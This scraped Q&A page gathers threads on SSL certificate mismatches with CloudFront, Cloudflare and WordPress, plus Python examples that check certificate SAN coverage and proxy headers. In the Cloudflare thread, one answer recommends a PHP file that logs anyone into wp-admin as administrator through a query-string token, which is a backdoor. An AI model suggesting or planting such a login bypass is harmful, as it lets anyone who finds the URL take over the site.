Configuring CloudFront with WordPress gives ssl_error_no_cypher_overlap error - wordpress

I am using AWS EC2 to host my WP site, which runs CyberPanel (LiteSpeed Ent and the LSCache plugin), with a free Let's SSL certificate (certbot).
I tried to activate the AWS CloudFront CDN on my site but I am getting the following errors:
SSL_ERROR_NO_CYPHER_OVERLAP in firefox
ERR_SSL_VERSION_OR_CIPHER_MISMATCH in Chrome
Below are screenshots of my various settings
Origin Setting
I am using Public DNS as my origin domain
Distribution Settings
Generated the SSL in AWS certificate and applied it here. Added cdn.domain.tld as an alternate domain name and added it as a CNAME pointing to the distribution in Route 53.
Default Cache Behavior Setting
I am not sure what I am doing wrong here?
Note: I have TLS v1.3 enabled in my Litespeed

OK, I found the solution. I was making some mistakes.
I have an SSL certificate for mydomain and its www version only. No wildcard SSL. And I was adding cdn.mydomain.tld as an alternate domain name, which has no valid SSL.
So I changed the alternate domain names to mydomain.tld and www.mydomain.tld and it started working.
Also, the SSL certificate that I generated in ACM was wrong. I added *.mydomain.tld as the domain name, but I had to add mydomain.tld also, which I did, and it solved the problem.
Hope this helps someone so that he/she does not make a silly mistake like me.
Thanks @Michael-sqlbot and Jeff from jeffreyeverhart.com for pointing me in the right direction.
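The three certificate states described in this thread, checked against the alternate domain names with RFC 6125-style wildcard matching. This is an added example, not code from the original posts; the function names and the sample certificates are constructed here, and the certificate dicts follow the shape returned by Python's ssl.SSLSocket.getpeercert().

```python
# Added example: which CloudFront alternate domain names does a
# certificate's SAN list actually cover?

def san_matches(pattern, hostname):
    """Match one DNS SAN entry against a hostname (RFC 6125 wildcard rules)."""
    p = pattern.lower().rstrip(".").split(".")
    h = hostname.lower().rstrip(".").split(".")
    if len(p) != len(h) or "" in h:
        return False                      # a wildcard never spans labels
    if p[0] == "*":
        # Wildcard accepted only as the whole left-most label, and only
        # above a two-label domain (conservative: rejects "*.tld").
        return len(p) > 2 and p[1:] == h[1:]
    return p == h

def dns_sans(cert):
    """DNS names from a dict shaped like ssl.SSLSocket.getpeercert()."""
    return [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]

def uncovered(cert, alternate_names):
    """Alternate domain names that no SAN entry in the certificate covers."""
    sans = dns_sans(cert)
    return [n for n in alternate_names
            if not any(san_matches(s, n) for s in sans)]

# Constructed certificates mirroring the states described in the thread.
CERT_APEX_WWW = {"subjectAltName": (("DNS", "mydomain.tld"),
                                    ("DNS", "www.mydomain.tld"))}
CERT_WILDCARD_ONLY = {"subjectAltName": (("DNS", "*.mydomain.tld"),)}
CERT_WILDCARD_APEX = {"subjectAltName": (("DNS", "*.mydomain.tld"),
                                         ("DNS", "mydomain.tld"))}

if __name__ == "__main__":
    names = ["mydomain.tld", "www.mydomain.tld"]
    # cdn.* is not on the apex+www certificate
    print(uncovered(CERT_APEX_WWW, ["cdn.mydomain.tld"]))
    # the wildcard alone leaves the apex uncovered
    print(uncovered(CERT_WILDCARD_ONLY, names))
    # wildcard plus apex covers both names
    print(uncovered(CERT_WILDCARD_APEX, names))
```

An empty result from uncovered() means every alternate domain name on the distribution has a matching SAN entry.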

Related

How to set up SSL with CloudFront for EC2 Instance (Wordpress)

I followed this guide to set up WordPress on EC2, but it doesn't cover how to enable HTTPS. I've used the 'WordPress Certified by Bitnami and Automattic' AMI.
I know I can use CloudFront in front of EC2 for SSL, but I'm having trouble getting it working. I've gotten Error 502 plus several others. So I'd like to start from scratch and confirm my approach is correct.
I've registered my own domain (example.com). In Route 53, I have 'blog.example.com' as an A record pointing to my instance's EIP. I also have a CNAME record for 'www.blog.example.com' pointing to 'blog.example.com'. Both URLs can access my instance via HTTP.
In CloudFront's configuration, my 'Origin Domain Name' is:
Public DNS (ec2-XX-XX-XX-XX.ap-southeast-2.compute.amazonaws.com)
'Origin Protocol Policy' is set to HTTP
'Viewer Protocol Policy' is set to 'Redirect HTTP to HTTPS'.
For SSL Certificate, I've requested a custom cert for both:
blog.example.com
www.blog.example.com
All other CF settings have been left as default. I can access the distribution's domain name but it's still HTTP.
After the distribution is deployed, I've changed the 'blog.example.com' record in Route 53 to have an alias target of CF's domain name (xxxxxxxxxxx.cloudfront.net).
What about the CNAME record (www.blog.example.com), should it be amended as well?
Up to this stage, I can access both 'www.blog.example.com' and 'blog.example.com' but it's HTTP and the EIP appears in the URL bar, not domain names.
What am I missing or have setup incorrectly?
I'm super new to AWS so many thanks in advance!
I am not sure if you are still looking for a solution, but here is how I accomplished setting up SSL on my EC2 instance.
1) I issued an SSL certificate for the URL that the EC2 instance was pointed at. I used AWS Certificate Manager to accomplish this.
There are two ways to verify domain authority: DNS and email. I have found DNS to be much easier, especially if you are using Route 53.
2) Next I had to list the alternate CNAMEs for both of my A records (www.example.com & example.com) within CloudFront (this tutorial was helpful). After selecting the CloudFront distribution, under the General tab click the Edit button. You will need to import your SSL certificate by selecting the radio button: Custom SSL Certificate (example.com) and then selecting the appropriate certificate that you created in Step 1.
Do keep in mind some of these steps required 15-20 minutes for the changes to propagate.
3) The final step is to point the A record within Route 53 to the CloudFront distribution's domain name.
The three AWS services you will need to utilize to accomplish this are Route 53, CloudFront (CDN), and Certificate Manager.
Hope this helps and good luck!
Your AWS configuration is looking fine. The problem is with your WordPress URL. In wp-config.php you can set the siteurl to your "domain.com", or you can set it by manually entering "domain.com" in the database. Make sure you enter https://youdomain in the siteurl field.

wordpress website admin login not working on https after cloudflare

I have a static website on which I installed Cloudflare Flexible SSL.
But now I have installed WordPress in a folder here: https://www.kiransboutique.com/wordpressrvc/
None of its links are working and wp-admin is also not redirecting to the dashboard. I am using the correct login credentials.
Can anybody suggest a solution? Exactly the same installation is working here: http://bestcoachingcenter.com/kirans/
To log in to your WordPress admin automatically, without entering the admin username and password each time, you can use the code snippet below.
Using this code in a PHP file and placing it in the root directory of your WordPress installation lets you log in to wp-admin with an administrator account.
To make it work, you need to hit the URL, passing the keyword “wpglogin” in the query string as given below:
http://www.sitename.com/codefile.php?wpglogin=YWRtaW4=
By hitting the above URL, you will get into the admin easily.
Your homepage is still in "hello World" state, so you may still want an answer. I had the same(?) problem; and checked posts like yours on Stackoverflow/Stackexchange - alas no joy.
What worked for me:
If you are using the official Cloudflare plugin ( https://wordpress.org/plugins/cloudflare/ ) set “Automatic HTTPS Rewrites” to “On”. This solved link and CSS issues under HTTPS, and saved me having to install additional SSL related plugins.
As a stopgap: if you have not configured WP to "force SSL" you might be able to log in using an "http://" address (as I was).
To enable "HTTPS" login, edit wp-config.php and insert the following line:
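// Behind Flexible SSL the origin sees plain HTTP; the proxy reports the viewer's scheme in this header.
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false)
    $_SERVER['HTTPS'] = 'on';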
If you want a bit more detail I posted about it here: http://wptest.means.us.com/cloudflare-wordpress-unable-login-https/
Note: Flexible SSL is better than no SSL as it encrypts the "connection" between you and Cloudflare. However, CF's connection to your server is still "HTTP" and your login credentials are STILL vulnerable to eavesdropping on this leg of the journey.
I'm still checking, but I think you can also make the CF <-> Server connection secure by enabling Cloudflare Railgun (used to reduce data transfer from your server). Railgun uses TLS, so data is encrypted. I assume if you use both Flexible SSL and Railgun your connections are secure end to end. Some inexpensive hosts include Railgun for free in their packages.
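X-Forwarded-Proto is an ordinary request header, so an origin that is also reachable directly will see whatever value a client chooses to send; the check below honours it only when the connection comes from a known proxy address. This is an added example, not code from the original answer: the function names are hypothetical, the proxy ranges are documentation placeholders, and the environ dict is a constructed CGI-style request.

```python
# Added example: decide whether the viewer connection was HTTPS, trusting
# X-Forwarded-Proto only when the peer is one of the CDN's proxies.
import ipaddress

# Placeholder ranges (RFC 5737 / RFC 3849 documentation addresses),
# constructed for this example. In production, load the CDN's
# published proxy ranges here instead.
TRUSTED_PROXIES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8::/32"),
]

def from_trusted_proxy(remote_addr):
    """True if the TCP peer address belongs to a trusted proxy range."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        return False                      # malformed address: never trust
    return any(addr in net for net in TRUSTED_PROXIES)

def request_is_https(environ):
    """environ: CGI-style dict (REMOTE_ADDR, HTTPS, HTTP_X_FORWARDED_PROTO)."""
    if environ.get("HTTPS", "").lower() == "on":
        return True                       # TLS terminated on this server
    if not from_trusted_proxy(environ.get("REMOTE_ADDR", "")):
        return False                      # header came from an untrusted peer
    # Exact match rather than a substring search on the header value.
    return environ.get("HTTP_X_FORWARDED_PROTO", "").strip().lower() == "https"

if __name__ == "__main__":
    via_proxy = {"REMOTE_ADDR": "203.0.113.7", "HTTP_X_FORWARDED_PROTO": "https"}
    direct = {"REMOTE_ADDR": "198.51.100.9", "HTTP_X_FORWARDED_PROTO": "https"}
    print(request_is_https(via_proxy))    # header accepted from the proxy
    print(request_is_https(direct))       # same header, untrusted peer
```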
You can fix the WordPress SSL login problem by entering your server IP in the Windows HOSTS file.
Find the hosts file in windows\system32\hosts and add your IP and domain name.

SSL error on woocommerce callback in wc auth

I am using the wc-auth login of WooCommerce,
the one like this: https://woocommerce.wordpress.com/2015/08/07/api-settings-and-the-api-authentication-endpoint-in-2-4/
Now, both sites have SSL installed properly; I checked them on online SSL checkers.
But on the wc-auth way of logging in, I get this error:
Error: SSL: no alternative certificate subject name matches target host name 'www.my-domain.com'
I have checked the alternative name and it has *.mydomain.com in it.
Hence I am unable to understand what the issue is.
If both sites' SSL checks out, then you should not be having any issues. For troubleshooting purposes, try using a callback_url without the www subdomain.

Setting up domain.com as the same Meteor deployment as www.domain.com

For a Meteor JS deployment, how do you point domain.com at the same deployment as www.domain.com?
I have the A record pointing at the same IP address as www., but I'm getting the "there is no site deployed at this address" message:
http://emiliotelevision.com
It appears Meteor's servers are not smart enough to make the site on www.emiliotelevision.com, which is working, also work for the equivalent without the www..
Is there a better solution for this than pointing at another one of your own servers configured to redirect to the www. version?
Use a CNAME record for both www.emiliotelevision.com and emiliotelevision.com that points to yourserver.meteor.com
You need to set a domain redirect. emiliotelevision.com should redirect to www.emiliotelevision.com.
Now you can meteor deploy to www.emiliotelevision.com.
You may be able to set up the redirect from where you purchased the domain main.

How do I correct the name of the security certificate does not match the name of the site?

My IIS site is giving browsers problems. They pop up a security warning that the security certificate does not match the name of the site. I'm using a self-signed certificate for testing. I view the certificate. It has the name.
DnsName.mydomain.com
but the browser is using
MachineName.mydomain.com
There is a CNAME entry pointing DnsName.mydomain.com to MachineName.mydomain.com.
Even so, they are obviously different. Can you tell me how I can get a new self-signed certificate with the name MachineName.mydomain.com, and how to install it on my test web server such that browsers can use either name without getting this security warning?
I can have the browser install any certificate a self-signed cert from my web server, that's not the problem. The problem is the warning. Here's a screen shot of what I mean.
You can only have one cert per site.
There are a couple of heavy-handed ways of getting around this:
Completely duplicate your site and have a cert on each
Use SSL-Acceleration and have two different external IPs on a load balancer that both point to the same internal.
There's also one easy way since you're already self-signing: just wildcard it (*.mydomain.com). Generating this on a Windows box is explained here, and generating this on a Linux box is explained here.
If you really don't want to do that, I'd just have a forced redirect from one URL to the other instead of a CNAME alias.
